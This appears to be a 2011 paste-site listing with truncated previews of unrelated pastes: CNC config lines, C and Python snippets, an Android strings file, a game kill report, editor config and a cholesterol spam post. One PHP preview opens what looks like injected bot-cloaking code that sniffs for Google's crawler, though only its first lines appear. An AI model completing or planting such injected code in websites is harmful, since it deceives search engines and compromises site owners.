-
2097223·text·1.2 KB·2011-12-29 18:17 UTC
Now I say Exceptionally strong for a reason. Over the holidays, while packing my van up with the three kidlets stuff. I brought a bunch of bags, gifts, toys, this thats and the other things, including
-
2097222·text·833 B·2011-12-29 18:11 UTC
loadusr -W arduino /dev/ttyUSB0
loadusr -Wn arduino-vcp pyvcp arduino-vcp.xml
loadrt scale count=1
show pin arduino-vcp
# may have to add functions to threads at some stage
# addf scale
-
2097221·text·832 B·2011-12-29 18:09 UTC
oadusr -W arduino /dev/ttyUSB0
loadusr -Wn arduino-vcp pyvcp arduino-vcp.xml
loadrt scale count=1
show pin arduino-vcp
# may have to add functions to threads at some stage
# addf scale.
-
2097220·actionscript·979 B·2011-12-29 18:00 UTC
I added apple trees to my RPG in Flash, I've got the art for apples and trees, and coding to make apples heal the player. What I'm trying to do is make the tree so that when your character is touching
-
2097213·text·2.4 KB·2011-12-29 16:26 UTC
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">Навагодняя галаваломка</string>
<string name="game_loading">Загрузка...</string>
<!-- MainListActivity --
-
2097210·text·1.4 KB·2011-12-29 15:46 UTC
<?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
-
2097207·text·39.2 KB·2011-12-29 15:16 UTC
-
2097203·text·2.2 KB·2011-12-29 15:07 UTC
#!/usr/bin/python
#Experiment to see how much the Hamming distance tells us about a string
#This does an exhaustive search on short strings to try to get a feeling for what is going on.
import
-
2097202·text·384.2 KB·2011-12-29 15:02 UTC
-
2097200·text·921 B·2011-12-29 14:39 UTC
2011.12.29 14:13:00
Victim: azeloki
Corp: Zeta One.
Alliance: Unknown
Faction: Unknown
Destroyed: Rapier
System: 6-CZ49
Security: -0.2
Damage Taken: 19369
Involved parties:
Name: Tomas
-
2097199·text·204.0 KB·2011-12-29 14:27 UTC
-
2097197·text·3.5 KB·2011-12-29 14:23 UTC
[url=http://www.healthycholesteroldiets.com]Cholesterol foods[/url]
In case you have ended up diagnosed with superior cholesterol or merely just want to acquire healthier care of one's health and w
-
2097194·c·1.4 KB·2011-12-29 11:54 UTC
#include <stdio.h>
#include <string.h>
struct puntos{
float x;
float y;
};
struct circulo{
float x_1;
float y_1;
float r;
int i;
};
struct rectangulo{
float p1_x;
float p1_y;
float p2
-
2097191·text·2.2 KB·2011-12-29 11:37 UTC
"1.0rc1
loadplugins '\.(js|penta)$'
group user
command! -nargs=* dk open https://duckduckgo.com/lite/?q=<args>&kp=-1&kl=ie-en&ki=-1&kz=-1&kc=-1&kn=-1&kf=-1&kb=n&kg=p&kh=1&kd=1&ko=-1&kk=-1&ke=-1&k
-
2097190·c·1.4 KB·2011-12-29 11:17 UTC
#include <stdio.h>
#include <string.h>
struct puntos{
float x;
float y;
};
struct circulo{
float x_1;
float y_1;
float r;
int i;
};
struct rectangulo{
float p1_x;
float p1_y;
float p2
-
2097180·xml·31.5 KB·2011-12-29 10:07 UTC
<resources script="Youtube Lyrics" version="3.04.00" language="en">
<resource id="LyricsPanelStyle" type="string">
.{0}Loading{background-image:url("{1}");background-repeat:no-repeat;background-p
-
2097179·xml·31.5 KB·2011-12-29 09:43 UTC
<resources script="Youtube Lyrics" version="3.04.00" language="en">
<resource id="LyricsPanelStyle" type="string">
.{0}Loading{background-image:url("{1}");background-repeat:no-repeat;background-p
-
2097173·php·304 B·2011-12-29 09:05 UTC
// Pridobi število dni v trenutnem mesecu, da lahko zapišem range od prvega do zadnjega v mesecu v obliki YYYY-MM-DD
$year = date('Y');
$month = date('j');
$start_day = '01';
$this_month_start
-
2097172·php·306 B·2011-12-29 09:04 UTC
// Pridobi število dni v trenutnem mesecu, da lahko zapišem range od prvega do zadnjega v mesecu v obliki YYYY-MM-DD
$year = date('Y');
$month = date('j');
$start_day = '01';
$this_month_start
-
2097171·text·394 B·2011-12-29 08:38 UTC
def mult(a,b):
table=[[[0, 1],[1, 1],[2, 1],[3, 1]],
[[1, 1],[0,-1],[3, 1],[2,-1]],
[[2, 1],[3,-1],[0,-1],[1, 1]],
[[3, 1],[2, 1],[1,-1],[1,-1]]]
c=[0.,0.,